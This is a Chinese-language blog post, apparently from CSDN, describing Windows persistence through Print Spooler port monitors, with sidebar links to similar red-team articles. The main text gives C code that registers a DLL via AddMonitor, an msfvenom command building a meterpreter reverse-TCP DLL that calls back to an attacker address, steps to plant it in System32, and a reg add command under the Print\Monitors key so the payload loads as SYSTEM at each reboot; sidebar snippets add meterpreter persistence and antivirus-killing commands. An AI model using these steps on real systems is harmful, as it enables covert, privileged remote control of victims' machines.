window权限维持——Monitor权限维持

已于 2022-02-19 22:35:04 修改
阅读量1.3k 收藏
点赞数
分类专栏: # 权限维持 # 红队技巧 文章标签: linux 安全 windows
于 2022-02-18 21:06:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123010795
版权

Monitor 权限维持

项目地址:
https://github.com/Al1ex/Monitor
#include “Windows.h”

int main() {
	MONITOR_INFO_2 monitorInfo;
	TCHAR env[12] = TEXT("Windows x64");
	TCHAR name[12] = TEXT("Monitor");
	TCHAR dll[12] = TEXT("test.dll");
	monitorInfo.pName = name;
	monitorInfo.pEnvironment = env;
	monitorInfo.pDLLName = dll;
	AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
	return 0;
}

pName //监视器名称
pEnvironment //环境架构
pDLLName //监视器DLL文件的名称

原理:
主要通过此项目实现一个白加黑的方式,此项目为白,我们创建的dll文件为黑,再通过注册表建立值,从而实现我们持续化的权限维持:

漏洞复现:
Step 2:使用Msfvenom生成dll攻击载荷:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f dll > shell.dll
test_dll

Step 3:将shell.dll复制到目标主机的system32目录下,之后重命名为test.dll(也就是上面的PDLLName,你也可以自己修改为自己喜欢的,总之随意)

copy C:\temp\shell.dll C:\Windows\System32\test.dll
copy

Step 4:之后进入system32目录,并执行以下命令(Monitors.exe为之前编译好的文件,也需要放置到system32目录下):
在这里插入图片描述

Monitors.exe

将Monitor及dll文件都放入目标主机的system32目录下:
注:这里dll文件名是因为直接拿的项目编译好的exe文件使用,所以需与源码里面写的名称一致,如自行编译,那么文件名称可更改。
在system32目录下执行Monitor.exe,成功反弹shell:

Step 5:之后成功接收到Meterpreter会话

在这里插入图片描述

持久化实现

为了实现持久性,我们需要在"Monitors"注册表位置下设置一个key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors
之后在命令行下执行以下命令创建一个注册表项,该注册表项将包含值test.dll,从编辑器中查看注册表验证密钥是否已创建:

reg add “hklm\system\currentcontrolset\control\print\monitors\Pentestlab” /v “Driver” /d “test.dll” /t REG_SZ
regedit

在这里插入图片描述

在这里插入图片描述

下次重新启动时,spoolsv.exe进程将加载Monitors注册表项中存在并存储在Windows文件夹System32中的所有驱动程序DLL文件,下图演示了Meterpreter会话已建立与Print Spooler服务(SYSTEM)相同级别的特权,并且已从System32文件夹执行了

shell

明月清风~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
meterpreter后渗透之权限维持
weixin_44255856的博客
08-09 3031
Persistence后门 使用此方法建议运行前关闭杀毒软件 Run post/windows/manage/killav 输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。 详细信息如下: -A 自动启动一个匹配的漏洞/多/处理程序来连接到代理 -L如果不使用%TEMP%,则选择目标主机中写入有效负载的...
System-Monitor:Windows 机器的系统监视器
06-21
监视器 只是... 好吧,让我更具体一点...... 这是 Visual Studio 2013 的项目。 这是用 C# 编写的。 您应该能够克隆存储库,将其放置在您的项目文件夹中,打开项目和 BAM! 都是好东西。
Window权限维持(九):端口监视器
11-11 647
后台打印程序服务负责管理Windows操作系统中的打印作业。与服务的交互通过打印后台处理程序API执行,该API包含一个函数(AddMonitor),可用于安装本地端口监视器并连接配置、数据和监视器文件。此函数能够将DLL注入spoolsv.exe进程,并且通过创建注册表项,red team operator可以在系统上实现持久性。Brady Bloxham在Defcon 22上演示...
windows monitor
lgj573
01-30 178
nagios + nsclient cacti perfmon.msc openNMS http://www.opennms.org/index.php/Installation:Windows
Windows权限维持之建立影子账号、powershell配置文件后门、Monitor权限维持
Longwaer
01-10 1731
通过学习掌握Windows权限维持小技巧,更好的运行相关知识点来进行权限维持,更快知晓权限维持的作用。
修改注册表的monitor键值进行权限维持
Shanfenglan's blog
03-04 417
文章目录操作效果 操作 需要管理员权限,将恶意的dll文件上传到system32文件夹下: copy test.dll c:\windows\system32 reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ 效果 当主机重启的时候会触发后门,且后门以system权限启动。 ...
Window权限维持(十二):辅助功能1
08-03
标题中的“Window权限维持(十二):辅助功能1”指的是在Windows操作系统中,攻击者如何利用辅助功能特性来保持持久的系统控制。辅助功能是为了帮助残障人士更好地使用计算机而设计的功能,例如粘滞键、屏幕键盘、...
获得管理员权限.zip
04-30
关于“window 脚本”这个标签,这里可能是指Windows脚本,它通常是指使用VBScript或JavaScript编写的小程序,用于自动化Windows系统中的任务。然而,根据上下文,这里的“脚本”更可能指的是注册表脚本,即.reg文件...
Window权限维持(三):新服务1
08-03
Window权限维持(三):新服务1
Window权限维持(二):计划任务1
08-03
Window权限维持(二):计划任务1
SystemMonitor-Windows:Windows程序用来显示系统资源,包括cpu,内存,磁盘等。
05-18
SystemMonitor-Windows Windows程序用来显示系统资源,包括cpu,内存,磁盘等。
Window权限维持(八):时间服务器1
08-03
但是,此方法需要管理员级别的特权,因为指向时间提供者DLL文件的注册表项存储在HKEY_LOCAL_MACHINE中。时间提供者–恶意DLL该服务将在Windo
windows权限维持
LainWith的博客
01-23 1146
目录php 不死马权限维持映像劫持策略组脚本权限维持shift后门建立影子账号背景解决注册表显示问题实操防御powershell配置文件后门Monitor 权限维持攻击演示持久化利用安全描述符隐藏服务后门直接注册为自启动服务获取恶意文件创建服务运行服务通过修改SDDL(安全描述符)隐藏服务隐藏服务修改注册表ACLiis后门iis环境准备操作windows 隐藏技术驱动级文件隐藏操作防御更多防御手段参考 php 不死马权限维持 使用如下代码: <?php ignore_user_abort(); //关
内网权限维持
m0_55751267的博客
11-22 1727
事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“Dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。管理员权限的后门可以设置更多的计划任务,例如重启后运行等。Run中的程序是WINDOWS初始化后才运行的,而RunService中的程序是在操作系统启动时就开始运行的,也就是说RunServices中的程序先于Run中的程序运行,如电源管理程序。反弹管理员shell。
Windows 权限维持手法
qq_53742230的博客
07-20 603
Windows 权限维持手法总结
The Windows System State Analyzer!
cnbird's blog
12-10 830
The Windows System State Analyzer!
SystemMonitor
技术推测阿堵孔家
05-31 579
class SystemMonitor { public:  // Access to the Singleton  static SystemMonitor* Get() {    // Uses the LeakySingletonTrait because cleanup is optional.    return        Singleton >::get
System Monitor Object(系统监控对象)
TigerJason的专栏
03-11 908
QTP对象描述:      在测试运行时,能够提取到一个系统计数器的信息。 相关的方法:     1:GetValue Method      2: IsCounterExist Method 方法一:        GetValue:        返回特定/某个系统计数器(系统评价指标)的当前值。        语法:          SystemMonitor.GetVa
打印机学习笔记
zYongheng的博客
05-07 711
打印机处理器(PrintProcessor) BOOL bRet = TRUE; CHAR pDriverDirectory[MAX_PATH]; DWORD pcbNeeded; //获取打印机驱动程序位置 if(FALSE == GetPrintProcessorDirectory(NULL, "Windows x64", 1, (LPBYTE...
java window 文件夹权限
最新发布
02-03
在Java中,可以使用java.io包中的File类来操作文件和文件夹权限。使用File类可以创建、删除、重命名文件和文件夹,以及获取文件和文件夹的属性和权限信息。 要设置文件和文件夹的权限,可以使用setReadable()、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值